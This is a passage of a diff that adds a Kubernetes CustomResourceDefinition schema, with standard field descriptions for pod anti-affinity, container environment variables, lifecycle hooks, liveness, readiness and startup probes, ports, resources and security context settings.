namespaces: + description: namespaces specifies a + static list of namespace names that + the term applies to. The term is applied + to the union of the namespaces listed + in this field and the ones selected + by namespaceSelector. null or empty + namespaces list and null namespaceSelector + means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where + co-located is defined as running on + a node whose value of the label with + key topologyKey matches that of any + node on which any of the selected + pods is running. Empty topologyKey + is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching + the corresponding podAffinityTerm, in + the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the anti-affinity requirements + specified by this field are not met at scheduling + time, the pod will not be scheduled onto the + node. If the anti-affinity requirements specified + by this field cease to be met at some point + during pod execution (e.g. due to a pod label + update), the system may or may not try to eventually + evict the pod from its node. When there are + multiple elements, the lists of nodes corresponding + to each podAffinityTerm are intersected, i.e. + all terms must be satisfied. 
+ items: + description: Defines a set of pods (namely those + matching the labelSelector relative to the + given namespace(s)) that this pod should be + co-located (affinity) or not co-located (anti-affinity) + with, where co-located is defined as running + on a node whose value of the label with key + <topologyKey> matches that of any node on + which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of + resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. + items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set + of namespaces that the term applies to. + The term is applied to the union of the + namespaces selected by this field and + the ones listed in the namespaces field. + null selector and null or empty namespaces + list means "this pod's namespace". An + empty selector ({}) matches all namespaces. + This field is beta-level and is only honored + when PodAffinityNamespaceSelector feature + is enabled. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. + items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed.
+ type: object + type: object + namespaces: + description: namespaces specifies a static + list of namespace names that the term + applies to. The term is applied to the + union of the namespaces listed in this + field and the ones selected by namespaceSelector. + null or empty namespaces list and null + namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where co-located + is defined as running on a node whose + value of the label with key topologyKey + matches that of any node on which any + of the selected pods is running. Empty + topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + type: object + automountServiceAccountToken: + description: AutomountServiceAccountToken indicates whether + a service account token should be automatically mounted. + type: boolean + containers: + description: List of containers belonging to the pod. + Containers cannot currently be added or removed. There + must be at least one container in a Pod. Cannot be updated. + items: + description: A single application container that you + want to run within a pod. + properties: + args: + description: 'Arguments to the entrypoint. The docker + image''s CMD is used if this is not provided. + Variable references $(VAR_NAME) are expanded using + the container''s environment. If a variable cannot + be resolved, the reference in the input string + will be unchanged. Double $$ are reduced to a + single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string + literal "$(VAR_NAME)". Escaped references will + never be expanded, regardless of whether the variable + exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within + a shell. The docker image''s ENTRYPOINT is used + if this is not provided. Variable references $(VAR_NAME) + are expanded using the container''s environment. + If a variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows for + escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" + will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless + of whether the variable exists or not. Cannot + be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set + in the container. Cannot be updated. + items: + description: EnvVar represents an environment + variable present in a Container. + properties: + name: + description: Name of the environment variable. + Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) + are expanded using the previously defined + environment variables in the container and + any service environment variables. If a + variable cannot be resolved, the reference + in the input string will be unchanged. Double + $$ are reduced to a single $, which allows + for escaping the $(VAR_NAME) syntax: i.e. 
+ "$$(VAR_NAME)" will produce the string literal + "$(VAR_NAME)". Escaped references will never + be expanded, regardless of whether the variable + exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's + value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: + supports metadata.name, metadata.namespace, + `metadata.labels[''<KEY>'']`, `metadata.annotations[''<KEY>'']`, + spec.nodeName, spec.serviceAccountName, + status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + limits.ephemeral-storage, requests.cpu, + requests.memory and requests.ephemeral-storage) + are currently supported.' + properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret + in the pod's namespace + properties: + key: + description: The key of the secret + to select from. Must be a valid + secret key. + type: string + name: + description: 'Name of the referent. + More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment + variables in the container. The keys defined within + a source must be a C_IDENTIFIER. All invalid keys + will be reported as an event when the container + is starting. When a key exists in multiple sources, + the value associated with the last source will + take precedence. Values defined by an Env with + a duplicate key will take precedence. Cannot be + updated. + items: + description: EnvFromSource represents the source + of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields.
apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap + must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend + to each key in the ConfigMap. Must be a + C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + optional: + description: Specify whether the Secret + must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images + This field is optional to allow higher level config + management to default or override container images + in workload controllers like Deployments and StatefulSets.' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, + Never, IfNotPresent. Defaults to Always if :latest + tag is specified, or IfNotPresent otherwise. Cannot + be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Actions that the management system + should take in response to container lifecycle + events. Cannot be updated. + properties: + postStart: + description: 'PostStart is called immediately + after a container is created. If the handler + fails, the container is terminated and restarted + according to its restart policy. Other management + of the container blocks until the hook completes. + More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. 
+ type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately + before a container is terminated due to an + API request or management event such as liveness/startup + probe failure, preemption, resource contention, + etc. The handler is not called if the container + crashes or exits. The reason for termination + is passed to the handler. The Pod''s termination + grace period countdown begins before the PreStop + hooked is executed. Regardless of the outcome + of the handler, the container will eventually + terminate within the Pod''s termination grace + period. Other management of the container + blocks until the hook completes or until the + termination grace period is reached. More + info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the + action to take. + properties: + command: + description: Command is the command + line to execute inside the container, + the working directory for the command is + root ('/') in the container's filesystem. + The command is simply exec'd, it is + not run inside a shell, so traditional + shell instructions ('|', etc) won't + work. To use a shell, you need to + explicitly call out to that shell. + Exit status of 0 is treated as live/healthy + and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http + request to perform. + properties: + host: + description: Host name to connect to, + defaults to the pod IP. You probably + want to set "Host" in httpHeaders + instead. + type: string + httpHeaders: + description: Custom headers to set in + the request. HTTP allows repeated + headers. + items: + description: HTTPHeader describes + a custom header to be used in HTTP + probes + properties: + name: + description: The header field + name + type: string + value: + description: The header field + value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet + supported TODO: implement a realistic + TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to + connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. 
Number + must be in the range 1 to 65535. Name + must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. + Container will be restarted if the probe fails. + Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. 
+ x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as + a DNS_LABEL. Each container in a pod must have + a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. + Exposing a port here gives the system additional + information about the network connections a container + uses, but is primarily informational. Not specifying + a port here DOES NOT prevent that port from being + exposed. Any port which is listening on the default + "0.0.0.0" address inside a container will be accessible + from the network. Cannot be updated. + items: + description: ContainerPort represents a network + port in a single container. + properties: + containerPort: + description: Number of port to expose on the + pod's IP address. This must be a valid port + number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external + port to. + type: string + hostPort: + description: Number of port to expose on the + host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork + is specified, this must match ContainerPort. + Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an + IANA_SVC_NAME and unique within the pod. + Each named port in a pod must have a unique + name. Name for the port that can be referred + to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, + TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service + readiness. Container will be removed from service + endpoints if the probe fails. Cannot be updated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. 
The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). 
This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this + container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount + of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum + amount of compute resources required. If Requests + is omitted for a container, it defaults to + Limits if that is explicitly specified, otherwise + to an implementation-defined value. More info: + https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'SecurityContext defines the security + options the container should be run with. If set, + the fields of SecurityContext override the equivalent + fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls + whether a process can gain more privileges + than its parent process. This bool directly + controls if the no_new_privs flag will be + set on the container process. AllowPrivilegeEscalation + is true always when the container is: 1) run + as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when + running containers. Defaults to the default + set of capabilities granted by the container + runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX + capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. + Processes in privileged containers are essentially + equivalent to root on the host. Defaults to + false. + type: boolean + procMount: + description: procMount denotes the type of proc + mount to use for the containers. The default + is DefaultProcMount which uses the container + runtime defaults for readonly paths and masked + paths. This requires the ProcMountType feature + flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only + root filesystem. Default is false. 
+ type: boolean + runAsGroup: + description: The GID to run the entrypoint of + the container process. Uses runtime default + if unset. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must + run as a non-root user. If true, the Kubelet + will validate the image at runtime to ensure + that it does not run as UID 0 (root) and fail + to start the container if it does. If unset + or false, no such validation will be performed. + May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of + the container process. Defaults to user specified + in image metadata if unspecified. May also + be set in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, the + value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied + to the container. If unspecified, the container + runtime will allocate a random SELinux context + for each container. May also be set in PodSecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + level: + description: Level is SELinux level label + that applies to the container. + type: string + role: + description: Role is a SELinux role label + that applies to the container. + type: string + type: + description: Type is a SELinux type label + that applies to the container. + type: string + user: + description: User is a SELinux user label + that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this + container. If seccomp options are provided + at both the pod & container level, the container + options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates + a profile defined in a file on the node + should be used. The profile must be preconfigured + on the node to work. Must be a descending + path, relative to the kubelet's configured + seccomp profile location. Must only be + set if type is "Localhost". + type: string + type: + description: "type indicates which kind + of seccomp profile will be applied. Valid + options are: \n Localhost - a profile + defined in a file on the node should be + used. RuntimeDefault - the container runtime + default profile should be used. Unconfined + - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied + to all containers. If unspecified, the options + from the PodSecurityContext will be used. + If set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes + precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where + the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) + inlines the contents of the GMSA credential + spec named by the GMSACredentialSpecName + field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the + name of the GMSA credential spec to use. 
+ type: string + hostProcess: + description: HostProcess determines if a + container should be run as a 'Host Process' + container. This field is alpha-level and + will only be honored by components that + enable the WindowsHostProcessContainers + feature flag. Setting this field without + the feature flag will result in errors + when validating the Pod. All of a Pod's + containers must have the same effective + HostProcess value (it is not allowed to + have a mix of HostProcess containers and + non-HostProcess containers). In addition, + if HostProcess is true then HostNetwork + must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to + run the entrypoint of the container process. + Defaults to the user specified in image + metadata if unspecified. May also be set + in PodSecurityContext. If set in both + SecurityContext and PodSecurityContext, + the value specified in SecurityContext + takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod + has successfully initialized. If specified, no + other probes are executed until this completes + successfully. If this probe fails, the Pod will + be restarted, just as if the livenessProbe failed. + This can be used to provide different probe parameters + at the beginning of a Pod''s lifecycle, when it + might take a long time to load data or warm a + cache, than during steady-state operation. This + cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following + should be specified. Exec specifies the action + to take. + properties: + command: + description: Command is the command line + to execute inside the container, the working + directory for the command is root ('/') + in the container's filesystem. The command + is simply exec'd, it is not run inside + a shell, so traditional shell instructions + ('|', etc) won't work. To use a shell, + you need to explicitly call out to that + shell. Exit status of 0 is treated as + live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for + the probe to be considered failed after having + succeeded. Defaults to 3. Minimum value is + 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request + to perform. + properties: + host: + description: Host name to connect to, defaults + to the pod IP. You probably want to set + "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the + request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom + header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP + server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting + to the host. Defaults to HTTP. 
+ type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container + has started before liveness probes are initiated. + More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform + the probe. Default to 10 seconds. Minimum + value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for + the probe to be considered successful after + having failed. Defaults to 1. Must be 1 for + liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action + involving a TCP port. TCP hooks not yet supported + TODO: implement a realistic TCP lifecycle + hook' + properties: + host: + description: 'Optional: Host name to connect + to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port + to access on the container. Number must + be in the range 1 to 65535. Name must + be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the + pod needs to terminate gracefully upon probe + failure. The grace period is the duration + in seconds after the processes running in + the pod are sent a termination signal and + the time when the processes are forcibly halted + with a kill signal. Set this value longer + than the expected cleanup time for your process. + If this value is nil, the pod's terminationGracePeriodSeconds + will be used. Otherwise, this value overrides + the value provided by the pod spec. Value + must be non-negative integer. The value zero + indicates stop immediately via the kill signal + (no opportunity to shut down). This is a beta + field and requires enabling ProbeTerminationGracePeriod + feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds + is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which + the probe times out. Defaults to 1 second. + Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate + a buffer for stdin in the container runtime. If + this is not set, reads from stdin in the container + will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should + close the stdin channel after it has been opened + by a single attach. When stdin is true the stdin + stream will remain open across multiple attach + sessions. If stdinOnce is set to true, stdin is + opened on container start, is empty until the + first client attaches to stdin, and then remains + open and accepts data until the client disconnects, + at which time stdin is closed and remains closed + until the container is restarted. If this flag + is false, a container processes that reads from + stdin will never receive an EOF. Default is false + type: boolean + terminationMessagePath: + description: 'Optional: Path at which the file to + which the container''s termination message will + be written is mounted into the container''s filesystem. + Message written is intended to be brief final + status, such as an assertion failure message. 
